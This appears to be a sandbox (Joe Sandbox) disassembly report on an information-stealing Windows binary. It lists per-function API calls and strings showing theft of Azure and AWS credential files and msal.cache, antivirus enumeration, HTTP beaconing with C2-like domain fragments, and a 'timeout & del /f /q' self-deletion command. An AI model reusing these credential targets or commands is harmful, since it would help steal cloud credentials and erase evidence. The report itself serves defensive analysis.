Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

Azure\.azure, xrefs: 00416531
Azure\.aws, xrefs: 004165A5
Azure\.IdentityService, xrefs: 00416619
*.*, xrefs: 00416536
*.*, xrefs: 004165AA
msal.cache, xrefs: 0041661E
\.aws\, xrefs: 00416589
\.azure\, xrefs: 00416512
\.IdentityService\, xrefs: 004165FD

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417A9A

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418000

Strings

hopto, xrefs: 00417E9F
e90840a846d017e7b095f7543cdf2d15, xrefs: 0041770C
org, xrefs: 00417EE7
http://, xrefs: 00417E57
_DEBUG.zip, xrefs: 00417F35
.exe, xrefs: 00417549
.exe, xrefs: 00417E04
cowod., xrefs: 00417E7B

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$_DEBUG.zip$cowod.$e90840a846d017e7b095f7543cdf2d15$hopto$http://$org
API String ID: 305159127-1328715557
Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

\xA, xrefs: 00405250, 00405457, 0040539E
GET, xrefs: 00405325

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\xA
API String ID: 442264750-571280152
Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Unknown, xrefs: 00411AB4
Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411AA0
displayName, xrefs: 00411A6F
WQL, xrefs: 00411A28
root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411A99

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00418271 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418456
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477
ExitProcess.KERNEL32 ref: 00418487

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

/c timeout /t 10 & del /f /q ", xrefs: 004182E5
" & exit, xrefs: 00418389
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
" & rd /s /q "C:\ProgramData\, xrefs: 00418333
xBx, xrefs: 00418417
" & exit, xrefs: 004183DA

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
